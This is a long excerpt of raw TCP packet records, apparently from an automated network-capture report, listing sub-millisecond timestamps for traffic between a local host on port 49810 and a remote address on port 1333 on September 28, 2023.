                                                                                              Sep 28, 2023 06:02:00.471014977 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.471025944 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.471076012 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.471079111 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.471116066 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.471129894 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.471158028 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.471167088 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.471211910 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.471247911 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.471293926 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.471347094 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.471388102 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.471393108 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.471426010 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.471443892 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.471489906 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.471497059 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.471530914 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.471544027 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.471571922 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.471596003 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.471642017 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.471668005 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.471719027 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.471751928 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.471801043 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.471833944 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.471851110 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.471879959 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.471899986 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.471906900 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.471951962 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.471956968 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.472007036 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.472043991 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.472090006 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.472106934 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.472151995 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.472188950 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.472234964 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.472271919 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.472316980 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.472353935 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.472388029 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.472400904 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.472407103 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.472430944 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.472460032 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.472496986 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.472539902 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.472543001 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.472588062 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.472625971 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.472692966 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.472729921 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.472795963 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.472807884 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.472848892 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.472860098 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.472891092 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.472927094 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.472975969 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.472975969 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.473014116 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.473026991 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.473058939 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.473063946 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.473109007 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.473114014 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.473160982 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.473177910 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.473222971 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.473311901 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.473364115 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.473383904 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.473428965 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.473449945 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.473470926 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.473501921 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.473532915 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.473543882 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.473591089 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.473592043 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.473628998 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.473640919 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.473670006 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.473678112 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.473723888 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.473757029 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.473803043 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.473838091 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.473856926 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.473885059 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.473916054 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.473942995 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.473990917 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.474026918 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.474076033 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.474082947 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.474133015 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.474169970 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.474215984 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.474225044 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.474270105 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.474281073 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.474313974 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.474328041 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.474358082 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.474378109 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.474416018 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.474442959 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.474478006 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.474483013 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.474518061 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.474533081 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.474570036 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.474570990 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.474617004 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.474654913 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.474704981 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.474718094 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.474764109 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.474788904 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.474806070 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.474838018 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.474868059 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.474883080 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.474927902 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.474930048 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.474982977 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.474999905 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.475020885 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.475050926 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.475080967 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.475091934 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.475126028 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.475136995 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.475177050 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.475667953 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.475712061 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.475719929 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.475754976 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.475754976 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.475800991 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.475831985 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.475848913 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.475881100 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.475912094 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.475922108 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.475967884 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.475970984 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.476021051 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.476058960 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.476106882 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.476135015 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.476182938 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.476218939 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.476237059 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.476264954 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.476274014 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.476284981 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.476310015 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.476324081 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.476351976 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.476358891 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.476403952 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.476424932 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.476470947 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.476524115 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.476572990 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.476610899 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.476649046 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.476663113 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.476692915 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.476700068 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.476746082 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.476775885 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.476809025 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.476824999 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.476854086 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.476861954 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.476906061 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.476943016 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.476962090 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.476993084 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.477024078 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.477063894 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.477113962 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.477150917 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.477195024 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.477199078 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.477235079 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.477241993 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.477282047 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.477305889 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.477360964 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.477374077 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.477417946 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.477432966 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.477478981 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.477514982 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.477565050 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.477600098 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.477637053 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.477650881 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.477654934 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.477680922 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.477710962 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.477721930 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.477756023 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.477768898 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.477802992 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.477806091 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.477852106 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.477890015 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.477909088 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.477938890 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.477942944 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.477958918 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.477981091 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.478014946 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.478060961 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.478099108 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.478132010 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.478147030 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.478177071 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.478188992 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.478234053 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.478264093 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.478308916 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.478327036 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.478343964 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.478374004 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.478404999 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.478435993 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.478482962 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.478521109 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.478570938 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.478609085 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.478658915 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.478697062 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.478730917 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.478746891 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.478776932 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.478784084 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.478827953 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.478864908 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.478883028 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.478913069 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.478944063 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.478955030 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.478988886 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.479001045 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.479033947 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.479039907 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.479088068 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.479125023 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.479173899 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.479199886 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.479250908 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.479288101 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.479337931 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.479367018 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.479413033 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.479439020 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.479484081 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.479595900 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.479614019 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.479630947 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.479644060 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.479649067 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.479670048 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.479670048 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.479701042 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.479708910 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.479752064 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.479792118 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.479837894 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.479875088 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.479895115 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.479912043 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.479929924 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.479929924 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.479962111 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.479985952 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.480029106 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.480061054 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.480107069 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.480144024 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.480191946 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.480228901 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.480276108 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.480313063 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.480359077 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.480390072 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.480423927 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.480437040 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.480443001 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.480477095 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.480478048 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.480478048 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.480514050 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.480528116 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.480556965 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.480578899 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.480597973 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.480629921 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.480629921 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.480746031 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.480763912 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.480798006 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.480798006 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.480827093 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.480869055 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.480874062 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.480907917 CEST133349810116.202.2.169192.168.2.3
                                                                                              Sep 28, 2023 06:02:00.480917931 CEST498101333192.168.2.3116.202.2.169
                                                                                              Sep 28, 2023 06:02:00.480946064 CEST498101333192.168.2.3116.202.2.169
